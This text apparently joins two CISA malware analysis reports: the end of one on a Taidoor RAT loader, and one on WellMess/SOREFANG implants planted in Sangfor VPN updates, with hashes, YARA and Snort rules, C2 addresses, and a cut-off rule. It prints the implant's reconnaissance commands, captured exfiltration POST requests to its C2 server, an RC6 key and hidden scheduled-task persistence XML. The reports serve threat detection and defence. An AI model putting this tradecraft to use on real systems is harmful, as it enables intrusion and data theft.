This file is a 64-bit Windows DLL file. The file “rasautoex.dll” is a Taidoor loader and will decrypt and execute the 64-bit version of Taidoor “svchost.dll” (6627918d989bd7d15ef0724362b67edd) in memory.

0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686

Tags

remote-access-trojan

Details
Name svchost.dll
Size 183808 bytes
Type data
MD5 6627918d989bd7d15ef0724362b67edd
SHA1 21e29034538bb4e3bc922149ef4312b90b6b4ea3
SHA256 0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686
SHA512 83ee751b15d8fd8477b8ecf8d33a4faf30b75aceb90c0e58ebf9dbbfc1d354f7e772f126b8462fd5897a4015a6f5e324d34900ff7319e8cc791fb239ca603ddc
ssdeep 3072:7PR4kaQOrd41zdruwiAyr/Ta1XxKH3zVrWvcfWslmOLdXFKY8SIMjUPpF5:3aQLgwiAyr/TiXxMsvcrxbnjUPP5
Entropy 7.999011
Antivirus

No matches found.

YARA Rules
  • rule CISA_10292089_01 : rat loader TAIDOOR
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10292089”
           Date = “2020-06-18”    
           Last_Modified = “20200616_1530”
           Actor = “n/a”
           Category = “Trojan Loader Rat”
           Family = “TAIDOOR”
           Description = “Detects Taidoor Rat Loader samples”
           MD5_1 = “8cf683b7d181591b91e145985f32664c”
           SHA256_1 = “363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90”
           MD5_2 = “6627918d989bd7d15ef0724362b67edd”
           SHA256_2 = “0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686”
       strings:
           $s0 = { 8A 46 01 88 86 00 01 00 00 8A 46 03 88 86 01 01 00 00 8A 46 05 88 86 02 01 00 00 8A 46 07 88 86 03 01 00 00 }
           $s1 = { 88 04 30 40 3D 00 01 00 00 7C F5 }
           $s2 = { 0F BE 04 31 0F BE 4C 31 01 2B C3 2B CB C1 E0 04 0B C1 }
           $s3 = { 8A 43 01 48 8B 6C 24 60 88 83 00 01 00 00 8A 43 03 }
           $s4 = { 88 83 01 01 00 00 8A 43 05 88 83 02 01 00 00 8A 43 07 88 83 03 01 00 00 }
           $s5 = { 41 0F BE 14 7C 83 C2 80 41 0F BE 44 7C 01 83 C0 80 C1 E2 04 0B D0 }
           $s6 = { 5A 05 B2 CB E7 45 9D C2 1D 60 F0 4C 04 01 43 85 3B F9 8B 7E }
       condition:
           ($s0 and $s1 and $s2) or ($s3 and $s4 and $s5) or ($s6)
    }
ssdeep Matches

No matches found.

Description

This encrypted file has been identified as the Taidoor RAT loaded by “rasautoex.dll” (4ec8e16d426a4aaa57c454c58f447c1e). This file contains the same functionality and encryption keys as the 32-bit version “svchost.dll” (8CF683B7D181591B91E145985F32664C).

This file calls out to a different C2. This C2 was also observed in memory of the infected system provided for analysis.

–Begin C2–
infonew.dubya.net
–End C2–

The malware author never removed the symbol file for “rasautoex.dll” as with the 32-bit version. However, this artifact provides some additional information that the malware author intended this binary to do, “MemLoad(pass symantec)”.

–Begin symbol file artifact–
C:UsersuserDesktopMemLoad(pass symantec)versionx64ReleaseMemoryLoad.pdb
–End symbol file artifact–

Relationship Summary

4a0688baf9… Used 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
363ea096a3… Used_By 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4
363ea096a3… Connected_To cnaweb.mrslove.com
363ea096a3… Connected_To 210.68.69.82
cnaweb.mrslove.com Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
210.68.69.82 Connected_From 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90

Mitigation

alert tcp 210.68.69.82 any <> $HOME_NET any (msg:” Malicious traffic “; sid:#########;
rev:1; classtype:tcp‐event;)

alert tcp 156.238.3.162 any <> $HOME_NET any (msg:”Malicious traffic”; sid:#########;
rev:1; classtype:tcp‐event;)

alert udp any any 53 <> $HOME_Net any (msg:”Attempt to connect to malicious domain”;
content: “www.infonew.dubya.net”; sid #########; rev:1;)

alert udp any any 53 <> $HOME_Net any (msg:”Attempt to connect to malicious domain”;
content: “www.cnaweb.mrslove.com”; sid#########; rev:1;)

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 3, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: July 16, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA). This malware has been identified as SOREFANG. Advanced persistent threat (APT) groups have been identified using this malware. For more information regarding this malware, please visit: https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development

This report analyzes three unique files. The files are Trojan implants designed to exploit Sangfor Secure Sockets Layer (SSL) virtual private network (VPN) servers. The malware replaces the Sangfor VPN software distributed to VPN clients. When installed, the implants provide the remote operator total control over the infected systems.

For a downloadable copy of IOCs, see MAR-10296782-1.v1.stix.

Submitted Files (3)

58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 (58d8e65976b53b77645c248bfa18c3…)

65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 (65495d173e305625696051944a36a0…)

a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 (a4b790ddffb3d2e6691dcacae08fb0…)

IPs (2)

103.216.221.19

192.168.169.103

Findings

65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75

Tags

spywaretrojan

Details
Name 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
Size 437760 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c5d5cb99291fa4b2a68b5ea3ff9d9f9a
SHA1 a1b5d50fe87f9c69a0e4da447f8d56155ce59e47
SHA256 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
SHA512 1f8e1ad6e910bdf3b251ffbb81b115233eb15be725d420139ba2af4f82009a655856e39bcb4d111b7bd1f135025f73d3eab1f32d1469f067966e82d14c5a0d3e
ssdeep 6144:ifY8W87LY6I0sl/myJy3FkwTCIoo4ECxAO7BjqxNuC:iAV+sl/mey3FnChxCuC
Entropy 6.205690
Antivirus
Ahnlab Malware/Win32.Generic
Antiy Trojan/Win32.Wacatac
Cyren W32/Trojan.ZYGO-1305
ESET a variant of Win32/Spy.Agent.PXZ trojan
Ikarus Trojan-Spy.Agent
K7 Spyware ( 0056414e1 )
Quick Heal Trojan.Agentb
TrendMicro TrojanS.6BD050DD
TrendMicro House Call TrojanS.6BD050DD
VirusBlokAda Trojan.Agentb
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = “CISA Code & Media Analysis”
        Date= “2020-07-06”
        Last_Modified=”20200706_1017″
        Actor=”n/a”
        Category=”Trojan”
        Family=”WellMess”
        Description = “Detects WellMess implant and SangFor Exploit”
        MD5_1 = “4d38ac3319b167f6c8acb16b70297111”
        SHA256_1 = “7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee”
        MD5_2 = “a32e1202257a2945bf0f878c58490af8”
        SHA256_2 = “a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064”
        MD5_3 = “861879f402fe3080ab058c0c88536be4”
        SHA256_3 = “14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2”
        MD5_4 = “2f9f4f2a9d438cdc944f79bdf44a18f8”
        SHA256_4 = “e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09”
        MD5_5 = “ae7a46529a0f74fb83beeb1ab2c68c5c”
        SHA256_5 = “fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950”
        MD5_6 = “f18ced8772e9d1a640b8b4a731dfb6e0”
        SHA256_6 = “953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a”
        MD5_7 = “3a9cdd8a5cbc3ab10ad64c4bb641b41f”
        SHA256_7 = “5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb”
        MD5_8 = “967fcf185634def5177f74b0f703bdc0”
        SHA256_8 = “58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2”
        MD5_9 = “c5d5cb99291fa4b2a68b5ea3ff9d9f9a”
        SHA256_9 = “65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75”
        MD5_10 = “01d322dcac438d2bb6bce2bae8d613cb”
        SHA256_10 = “0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494”
        MD5_11 = “8777a9796565effa01b03cf1cea9d24d”
        SHA256_11 = “83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18”
        MD5_12 = “507bb551bd7073f846760d8b357b7aa9”
        SHA256_12 = “47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854”
    strings:
        $0 = “/home/ubuntu/GoProject/src/bot/botlib/chat.go”
        $1 = “/home/ubuntu/GoProject/src/bot/botlib.Post”
        $2 = “GoProject/src/bot/botlib.deleteFile”
        $3 = “ubuntu/GoProject/src/bot/botlib.generateRandomString”
        $4 = “GoProject/src/bot/botlib.AES_Decrypt”
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = “get_keyRC6”
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = “GoProject/src/bot/botlib.wellMess”
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-28 07:37:41-04:00
Import Hash de67eebbdb41eb69bfdf6c23a6479582
Company Name Sangfor Technologies Co.,Ltd
File Description SangforUD
Internal Name SangforUD.exe
Legal Copyright Copyright (C) 2015
Original Filename SangforUD.EXE
Product Name SangforUD application
Product Version 7.6.0.100
PE Sections
MD5 Name Raw Size Entropy
79b491fc5059891654fc228b26171f6d header 1024 3.067812
471b9d4a35e5f8b569ae1ca6bc91aba1 .text 240128 6.589660
d74b8d761debb3939c3878052199ffa2 .rdata 74240 5.586653
463a4a2ba2e9496201b711302c4e3008 .data 5120 3.612142
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
e9edb21c8ad50896cd623d0172835e6d .rsrc 103936 3.885868
1d7b5cd8dcec22299f23bb463562815a .reloc 12800 6.559632
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
65495d173e… Connected_To 103.216.221.19
Description

This application is a malicious 32-bit Windows executable. The executable exploits a vulnerability identified within Sangfor SSL VPN devices. The vulnerability can be leveraged to gain control over systems because the VPN clients do not properly verify the integrity of software updates. The malware exploits this vulnerability by replacing software update binaries on compromised VPN servers. The malicious binaries are then delivered and executed on the VPN clients reporting to the infected VPN server.

During runtime, the malware immediately attempts to clear all files from the directories “\Sangfor\SSL\Log\” and “\Sangfor\SSL\Dump\”.

The malware then attempts to install itself as the file “\Sangfor\SSL\SanforUPD.exe”. This will make this binary presumably the first update executable that gets served out as application updates to targeted Sangfor VPN clients.

Next, it checks for the presence of a file named “\Sangfor\SSL\.SangforUD.sum”. If this file is not present, the malware will collect information from the infected system, using the following commands:

—Begin Information Collection Commands—
systeminfo.exe
ipconfig.exe /all
cmd.exe /c set
net.exe user
HOSTNAME.EXE
net.exe user /domain
net.exe group /domain
tasklist.exe /V
whoami.exe /all
—End Information Collection Commands—

It will also enumerate folders on disk. The collected system information and the result of the file enumerations are stored in a buffer in system memory. The malware collected the following information during analysis:

—Begin Information Collected—
User information (user name and SID)
Group information (Group name, type, SID, and attributes)
Privileges information (Privilege name, description, state (disabled, enabled, N/A))
—End Information Collected—

This data will next be encrypted, encoded, and then transmitted to the command and control (C2) server Internet Protocol (IP) address 103.216.221.19.

The data sent to the C2 server is encrypted utilizing a Rivest cipher 6 (RC6) cryptographic algorithm. The key used to encrypt the outbound data is dynamically generated during each C2 session. The RC6 key is appended to the outbound data so the remote operator will be able to decrypt the incoming data. The RC6 key can be found within the “filename” field of the C2 outbound data. For example, in the following example (partial) transmission the RC6 key d4908a2e47ff25c44054f8e623426243 can be utilized to decrypt the C2 data.

—Begin Partial C2 Transmission—
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=—-974767299852498929531610575
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Host: 103.216.221.19
Content-Length: 38886
Cache-Control: no-cache

——974767299852498929531610575
Content-Disposition: form-data; name=”_ga”; filename=”d4908a2e47ff25c44054f8e623426243″
Content-Type: application/octet-stream

cktTaQTE2ed BUVZaeg tMkXS 5YrSj6zdDKXYl2v LQCi85ZruMOUmkSLpc0f Tychyjhpo9fJHt5EIQw, ZREaS. 3s4al2OGFMBkiqrDsN, EMfzzmDWPGoATf, oM3n kvApOjc85g1jx qACIwvhAC3lz3jTb3p6D, YI2gZ63Wpob9Bm88 gZIqfg6h. ohjr ecwax41ACb9Bm8khPfh hO0Aku, VqtXhmDmOTUen 019HaS6Wmy639Km ttKwx62W2EIw. vhAC3kKL, zp3Gg CQdqXRmDmOTWe1n0IZD, EEVytbV4Zg5jk1Hp9Nf, R2kuvB06xoA. kHazjW0VlmP7J KUxnye
—End Partial C2 Transmission—

The encrypted C2 traffic is encoded with a slightly modified Base64 algorithm. The encoded data appears to match Base64 encoded data except there are spaces in between parts of the data (0x20). An example of this is illustrated below where the first 32-bytes of the outbound data is replaced with the American Standard Code for Information Interchange (ASCII) bytes “x”.

—Begin Base64 Modification—
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=—-974767299852498929531610575
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Host: 103.216.221.19
Content-Length: 24307
Cache-Control: no-cache

——974767299852498929531610575
Content-Disposition: form-data; name=”_ga”; filename=”7e061a180fa24eb5a318d6eae8797cc2″
Content-Type: application/octet-stream

eHh4eH h4eHh4eHh4eHh4eHh4eH h4eHh4eH h4eHh4eHhB6e, RwoJe. cqpDFRSyMwBqaG4 INaFZG9zm2 A7siND60oM4QhhCrf oAiAvC OUMq3, W1ZlPGq kKhkRkwjNYu1dc6. bUmU8ashTA Q8KSyp2xCnA m3A24PU 6KLQqzPsMiMmEZ9A, EQF4. Ryhld1t WZTxqZCoZEZMKzA6gq TaENSD6e6Izy9Caj6 W3Z9jNkB1 7tQpuEnU266hhaEc 4WwEPCkssdCs4GF. MoVXhKQHl6C aj4t8u6I ueaakH1 60jPL 0JqH1 bdn2M. 2QHWcgYUyhVeEqhj6I Pu6ANJXvs, zSvNsUXthp5NIDV0i
—End Base64 Modification—

As illustrated, it appears exactly like the Base64 output of encoding the ASCII bytes “x” with the exception of the periodic spaces within the encoded data.

The malware will attempt to query its remote C2 server every 900000 milliseconds with the POST request containing encrypted information about the victim system, each time querying the server for 260 bytes of data and searching it for the value “200” to ensure the data was received successfully, and the remote C2 server is alive (Figure 1).

If the malware is able to successfully pass and receive data from its C2 server, it will then generate 32-bytes of data and record the data into a file named “\Sangfor\SSL\.SangforUD.sum”.

The malware will then enter a loop in which it attempts to download payloads from its C2 server every 900000 milliseconds. The 32-bytes of data contained with the newly created file “.SangforUD.sum” will be contained within these connections to the malware’s C2 server.

It is not known what the C2 server does with this 32-byte value, however the malware only creates this 32-byte value and writes it to the file “SangforUD.sum” once, which suggests the 32-bit value is a unique identifier for each compromised VPN server.

Each payload downloaded from the C2 server will be immediately Base64 decoded, RC6 decrypted, executed using CreateProcessW, and then copied to the system as “\Sangfor\SSL\SangforUDC.exe”.

In addition, the malware decrypts the following Extensible Markup Language (XML) data indicating it uses scheduled tasks to attain persistence on a target Windows system. This data is decrypted using the RC6 algorithm with the key: 2B6233EB3E872FF78988F4A8F3F6A3BA.

—Begin Decrypted XML Task Data—
<?xml version=”1.0″ encoding=”UTF-16″?>
< Task version=”1.3″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
< RegistrationInfo>
< Date>2019-07-16T06:00:28.6871947</Date>
< Author>Sangfor Technologies Co.,Ltd</Author>
< URI>SangforUpade</URI>
< /RegistrationInfo>
< Triggers>
< CalendarTrigger>
< Repetition>
< Interval>P1D</Interval>
< StopAtDurationEnd>false</StopAtDurationEnd>
< /Repetition>
< StartBoundary>2019-07-16T00:00:00</StartBoundary>
< Enabled>true</Enabled>
< ScheduleByDay>
< DaysInterval>1</DaysInterval>
< /ScheduleByDay>
< /CalendarTrigger>
< /Triggers>
< Settings>
< MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
< DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
< StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
< AllowHardTerminate>true</AllowHardTerminate>
< StartWhenAvailable>true</StartWhenAvailable>
< RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
< IdleSettings>
< StopOnIdleEnd>true</StopOnIdleEnd>
< RestartOnIdle>false</RestartOnIdle>
< /IdleSettings>
< AllowStartOnDemand>true</AllowStartOnDemand>
< Enabled>true</Enabled>
< Hidden>true</Hidden>
< RunOnlyIfIdle>false</RunOnlyIfIdle>
< DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
< UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
< WakeToRun>true</WakeToRun>
< ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
< Priority>7</Priority>
< RestartOnFailure>
< Interval>PT1M</Interval>
< Count>3</Count>
< /RestartOnFailure>
< /Settings>
< Actions Context = “Author”>
< Exec>
< Command></Command>
< /Exec>
< /Actions>
—End Decrypted XML Task Data—

Screenshots

Figure 1 - Screenshot of the connection to the C2 server when attempting to download an RC6 encrypted executable payload. Note: the unique identifier is within the "_ga=" field.

Figure 1 – Screenshot of the connection to the C2 server when attempting to download an RC6 encrypted executable payload. Note: the unique identifier is within the “_ga=” field.

Figure 2 - Screenshot of the malware querying the C2 server after conducting the initial connection. The initial connection will pass information stolen from the target system to the C2 server, including a unique hash used as a victim system identifier. After a successful initial connection with the C2, the malware will begin attempting to download RC6 executable payloads.

Figure 2 – Screenshot of the malware querying the C2 server after conducting the initial connection. The initial connection will pass information stolen from the target system to the C2 server, including a unique hash used as a victim system identifier. After a successful initial connection with the C2, the malware will begin attempting to download RC6 executable payloads.

Figure 3 - Screenshot of the initialization function for the RC6 algorithm contained in the malware.

Figure 3 – Screenshot of the initialization function for the RC6 algorithm contained in the malware.

103.216.221.19

Tags

command-and-control

HTTP Sessions
  • POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=—-974767299852498929531610575
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
    Host: 103.216.221.19
    Content-Length: 38886
    Cache-Control: no-cache
Whois

Queried whois.apnic.net with “103.216.221.19”…
% Information related to ‘103.216.220.0 – 103.216.223.255’
% Abuse contact for ‘103.216.220.0 – 103.216.223.255’ is ‘abuse@hostuniversal.com.au’
inetnum:        103.216.220.0 – 103.216.223.255
netname:        HOST-AU
descr:         Host Universal Pty Ltd
country:        AU
org:            ORG-HUPL1-AP
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
abuse-c:        AH892-AP
status:         ALLOCATED PORTABLE
remarks:        ——————————————————–
remarks:        To report network abuse, please contact mnt-irt
remarks:        For troubleshooting, please contact tech-c and admin-c
remarks:        Report invalid contact via www.apnic.net/invalidcontact
remarks:        ——————————————————–
mnt-by:         APNIC-HM
mnt-lower:     MAINT-HOST-AU
mnt-routes:     MAINT-HOST-AU
mnt-irt:        IRT-HOST-AU
last-modified: 2020-06-10T13:06:06Z
source:         APNIC
irt:            IRT-HOST-AU
address:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So
e-mail:         abuse@hostuniversal.com.au
abuse-mailbox: abuse@hostuniversal.com.au
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
auth:         # Filtered
remarks:        abuse@hostuniversal.com.au was validated on 2020-06-25
mnt-by:         MAINT-HOST-AU
last-modified: 2020-06-25T16:58:38Z
source:         APNIC
organisation: ORG-HUPL1-AP
org-name:     Host Universal Pty Ltd
country:        AU
address:        Host Universal Pty Ltd
address:        c/o Brentnalls SA
address:        255 Port Road, Hindmarsh SA 5007, Australia
phone:         +61403394019
e-mail:         abuse@hostuniversal.com.au
mnt-ref:        APNIC-HM
mnt-by:         APNIC-HM
last-modified: 2018-03-20T12:57:09Z
source:         APNIC
role:         ABUSE HOSTAU
address:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So
country:        ZZ
phone:         +000000000
e-mail:         abuse@hostuniversal.com.au
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
nic-hdl:        AH892-AP
remarks:        Generated from irt object IRT-HOST-AU
abuse-mailbox: abuse@hostuniversal.com.au
mnt-by:         APNIC-ABUSE
last-modified: 2020-06-10T13:06:05Z
source:         APNIC
role:         Host Universal Pty Ltd administrator
address:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So
country:        AU
phone:         +61403394019
fax-no:         +61403394019
e-mail:         abuse@hostuniversal.com.au
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
nic-hdl:        HUPL1-AP
mnt-by:         MAINT-HOST-AU
last-modified: 2016-05-03T06:34:59Z
source:         APNIC
% Information related to ‘103.216.221.0/24AS136557’
route:         103.216.221.0/24
origin:         AS136557
descr:         Host Universal Pty Ltd
               Host Universal Pty Ltd
               c/o Brentnalls SA
               255 Port Road, Hindmarsh SA 5007, Australia
mnt-by:         MAINT-HOST-AU
last-modified: 2019-12-19T00:21:46Z
source:         APNIC

Relationships
103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Description

65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 and 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 attempt to connect to the IP address.

58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2

Tags

spywaretrojan

Details
Name 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Size 428032 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 967fcf185634def5177f74b0f703bdc0
SHA1 152189b62c546d6297a7083778fba62dcec576be
SHA256 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
SHA512 184dba49900a9b7c2c170c857806bff67c2fb51bcfad672f841d8c484e0c4452a3599f237dadbd6b6eb44a5f541dd6282bee4654486f5003111558262a9c357f
ssdeep 6144:AC70wZI2ZhjKOYTvkh+YVSn9bEAMpNZr3qHLAONXGCSxfuMBES:/lZIpQoYVmZERH0LguMWS
Entropy 6.211072
Antivirus
Ahnlab Malware/Win32.Generic
Antiy Trojan/Win32.Wacatac
ESET a variant of Win32/Spy.Agent.PXZ trojan
Ikarus Trojan-Spy.Agent
K7 Spyware ( 0056414e1 )
Microsoft Security Essentials Trojan:Win32/Skeeyah.B!rfn
Quick Heal Trojan.Agentb
TrendMicro TrojanS.F2D90167
TrendMicro House Call TrojanS.F2D90167
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = “CISA Code & Media Analysis”
        Date= “2020-07-06”
        Last_Modified=”20200706_1017″
        Actor=”n/a”
        Category=”Trojan”
        Family=”WellMess”
        Description = “Detects WellMess implant and SangFor Exploit”
        MD5_1 = “4d38ac3319b167f6c8acb16b70297111”
        SHA256_1 = “7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee”
        MD5_2 = “a32e1202257a2945bf0f878c58490af8”
        SHA256_2 = “a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064”
        MD5_3 = “861879f402fe3080ab058c0c88536be4”
        SHA256_3 = “14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2”
        MD5_4 = “2f9f4f2a9d438cdc944f79bdf44a18f8”
        SHA256_4 = “e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09”
        MD5_5 = “ae7a46529a0f74fb83beeb1ab2c68c5c”
        SHA256_5 = “fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950”
